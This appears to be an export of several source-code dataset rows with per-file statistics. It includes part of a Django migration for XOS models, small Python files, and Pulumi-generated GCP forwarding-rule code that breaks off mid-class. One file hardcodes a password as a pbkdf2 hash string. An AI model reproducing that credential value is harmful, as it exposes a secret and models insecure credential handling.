field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='serviceattribute_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='servicedependency_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='servicedependency_decl',
name='connect_method',
field=models.CharField(blank=True, choices=[(b'none', b'None'), (b'private', b'Private'), (b'public', b'Public')], default=b'none', help_text=b'method to connect the two services', max_length=30),
),
migrations.AlterField(
model_name='servicedependency_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='servicedependency_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='servicegraphconstraint_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='servicegraphconstraint_decl',
name='constraints',
field=core.models.xosbase_header.StrippedCharField(blank=True, help_text=b'A composite array defining positions, eg [volt, vsg, [address_manager, vrouter]]', max_length=1024),
),
migrations.AlterField(
model_name='servicegraphconstraint_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='servicegraphconstraint_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='serviceinstance_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='serviceinstance_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='serviceinstance_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='serviceinstanceattribute_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='serviceinstanceattribute_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='serviceinstanceattribute_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='serviceinstancelink_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='serviceinstancelink_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='serviceinstancelink_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='serviceinterface_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='serviceinterface_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='serviceinterface_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='serviceport_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='serviceport_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='serviceport_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='site_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='site_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='site_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='sitedeployment_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='sitedeployment_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='sitedeployment_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='siteprivilege_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='siteprivilege_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='siteprivilege_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='siterole_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='siterole_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='siterole_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='slice_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='slice_decl',
name='controller_replica_count',
field=models.IntegerField(blank=True, default=0, help_text=b'Replica count, controller-dependent', null=True),
),
migrations.AlterField(
model_name='slice_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='slice_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='sliceprivilege_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='sliceprivilege_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='sliceprivilege_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='slicerole_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='slicerole_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='slicerole_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='tag_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='tag_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='tag_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='trustdomain_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='trustdomain_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='trustdomain_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='xoscore_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='xoscore_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='xoscore_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='xosguiextension_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='xosguiextension_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='xosguiextension_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
]
| 51.157289
| 208
| 0.647694
| 4,514
| 40,005
| 5.59393
| 0.048294
| 0.070215
| 0.148509
| 0.17227
| 0.956754
| 0.954299
| 0.953665
| 0.921785
| 0.92028
| 0.916716
| 0
| 0.014363
| 0.253393
| 40,005
| 781
| 209
| 51.222791
| 0.831057
| 0.015923
| 0
| 0.963158
| 0
| 0
| 0.318332
| 0.025564
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005263
| 0
| 0.009211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8e2de31245112265071ddb48b3a3643ca28e9270
| 54
|
py
|
Python
|
src/thexb/TOOL_tree_viewer_input_stats.py
|
harris-2374/THEx
|
04c4f56eb2cf86b8f55ddd6edd3f48029296bf5a
|
[
"MIT"
] | null | null | null |
src/thexb/TOOL_tree_viewer_input_stats.py
|
harris-2374/THEx
|
04c4f56eb2cf86b8f55ddd6edd3f48029296bf5a
|
[
"MIT"
] | null | null | null |
src/thexb/TOOL_tree_viewer_input_stats.py
|
harris-2374/THEx
|
04c4f56eb2cf86b8f55ddd6edd3f48029296bf5a
|
[
"MIT"
] | null | null | null |
import pandas as pd
def tv_input_stats():
return
| 10.8
| 21
| 0.722222
| 9
| 54
| 4.111111
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 54
| 5
| 22
| 10.8
| 0.880952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
6d2a9234a529ae8e91c8e2f16708dcdf05792d05
| 93
|
py
|
Python
|
squirrel_maze/_entrypoints.py
|
princeodd47/squirrel-maze
|
4abca698ba7b11aa0fd239c49e63a7bc90bd9dfe
|
[
"MIT"
] | 1
|
2021-05-27T01:23:51.000Z
|
2021-05-27T01:23:51.000Z
|
squirrel_maze/_entrypoints.py
|
princeodd47/squirrel-maze
|
4abca698ba7b11aa0fd239c49e63a7bc90bd9dfe
|
[
"MIT"
] | 2
|
2019-03-30T20:18:43.000Z
|
2021-06-28T02:38:03.000Z
|
squirrel_maze/_entrypoints.py
|
princeodd47/squirrel-maze
|
4abca698ba7b11aa0fd239c49e63a7bc90bd9dfe
|
[
"MIT"
] | 1
|
2019-03-28T12:40:34.000Z
|
2019-03-28T12:40:34.000Z
|
from squirrel_maze.resources import menus as sm_menus
def main():
sm_menus.main_menu()
| 15.5
| 53
| 0.763441
| 15
| 93
| 4.466667
| 0.733333
| 0.208955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 93
| 5
| 54
| 18.6
| 0.858974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
edf0f03a6decfc9aca4649fb4cde290763565fb0
| 92
|
py
|
Python
|
parameters_6971.py
|
hooshingschaefer/webapps
|
f812fc6eaec4d9620e660e33af473539c3f33c31
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_6971.py
|
hooshingschaefer/webapps
|
f812fc6eaec4d9620e660e33af473539c3f33c31
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_6971.py
|
hooshingschaefer/webapps
|
f812fc6eaec4d9620e660e33af473539c3f33c31
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$98df120a24be5267$7a0b5fe97099e874d672f94f998dc747120df93b"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.527473
| 0.01087
| 92
| 1
| 92
| 92
| 0.373626
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
61035162f9b1243cd6b054a1b38169bbdccf9c05
| 116
|
py
|
Python
|
test_numericalunits.py
|
pulkin/numericalunits
|
7661d759e2b3924e504ed9d9054d756b9a7b51ec
|
[
"MIT"
] | null | null | null |
test_numericalunits.py
|
pulkin/numericalunits
|
7661d759e2b3924e504ed9d9054d756b9a7b51ec
|
[
"MIT"
] | null | null | null |
test_numericalunits.py
|
pulkin/numericalunits
|
7661d759e2b3924e504ed9d9054d756b9a7b51ec
|
[
"MIT"
] | null | null | null |
from numericalunits import eval, kg, m, s
assert eval("kg") == kg
assert eval("kg * m / s ** 2") == kg * m / s ** 2
| 29
| 49
| 0.568966
| 21
| 116
| 3.142857
| 0.428571
| 0.272727
| 0.181818
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.232759
| 116
| 3
| 50
| 38.666667
| 0.719101
| 0
| 0
| 0
| 0
| 0
| 0.146552
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
612993ed5d83d1c04f7adbc3323c5fc883ce5bfe
| 98,684
|
py
|
Python
|
sdk/python/pulumi_gcp/compute/global_forwarding_rule.py
|
la3mmchen/pulumi-gcp
|
0e3c6fecd062dff78a4fd95b7ebd5ce4492ad1ea
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/compute/global_forwarding_rule.py
|
la3mmchen/pulumi-gcp
|
0e3c6fecd062dff78a4fd95b7ebd5ce4492ad1ea
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/compute/global_forwarding_rule.py
|
la3mmchen/pulumi-gcp
|
0e3c6fecd062dff78a4fd95b7ebd5ce4492ad1ea
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['GlobalForwardingRuleArgs', 'GlobalForwardingRule']
@pulumi.input_type
class GlobalForwardingRuleArgs:
def __init__(__self__, *,
target: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ip_protocol: Optional[pulumi.Input[str]] = None,
ip_version: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
load_balancing_scheme: Optional[pulumi.Input[str]] = None,
metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
port_range: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a GlobalForwardingRule resource.
:param pulumi.Input[str] target: The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[str] ip_address: The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
:param pulumi.Input[str] ip_version: The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this forwarding rule. A list of key->value pairs.
:param pulumi.Input[str] load_balancing_scheme: This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
:param pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]] metadata_filters: Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
:param pulumi.Input[str] name: Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
:param pulumi.Input[str] network: This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
:param pulumi.Input[str] port_range: This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "target", target)
if description is not None:
pulumi.set(__self__, "description", description)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ip_version is not None:
pulumi.set(__self__, "ip_version", ip_version)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if load_balancing_scheme is not None:
pulumi.set(__self__, "load_balancing_scheme", load_balancing_scheme)
if metadata_filters is not None:
pulumi.set(__self__, "metadata_filters", metadata_filters)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if port_range is not None:
pulumi.set(__self__, "port_range", port_range)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def target(self) -> pulumi.Input[str]:
"""
The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: pulumi.Input[str]):
pulumi.set(self, "target", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter(name="ipVersion")
def ip_version(self) -> Optional[pulumi.Input[str]]:
"""
The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
"""
return pulumi.get(self, "ip_version")
@ip_version.setter
def ip_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_version", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to this forwarding rule. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="loadBalancingScheme")
def load_balancing_scheme(self) -> Optional[pulumi.Input[str]]:
"""
This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
"""
return pulumi.get(self, "load_balancing_scheme")
@load_balancing_scheme.setter
def load_balancing_scheme(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing_scheme", value)
@property
@pulumi.getter(name="metadataFilters")
def metadata_filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]:
"""
Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
"""
return pulumi.get(self, "metadata_filters")
@metadata_filters.setter
def metadata_filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]):
pulumi.set(self, "metadata_filters", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="portRange")
def port_range(self) -> Optional[pulumi.Input[str]]:
"""
This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
"""
return pulumi.get(self, "port_range")
@port_range.setter
def port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_range", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _GlobalForwardingRuleState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ip_protocol: Optional[pulumi.Input[str]] = None,
ip_version: Optional[pulumi.Input[str]] = None,
label_fingerprint: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
load_balancing_scheme: Optional[pulumi.Input[str]] = None,
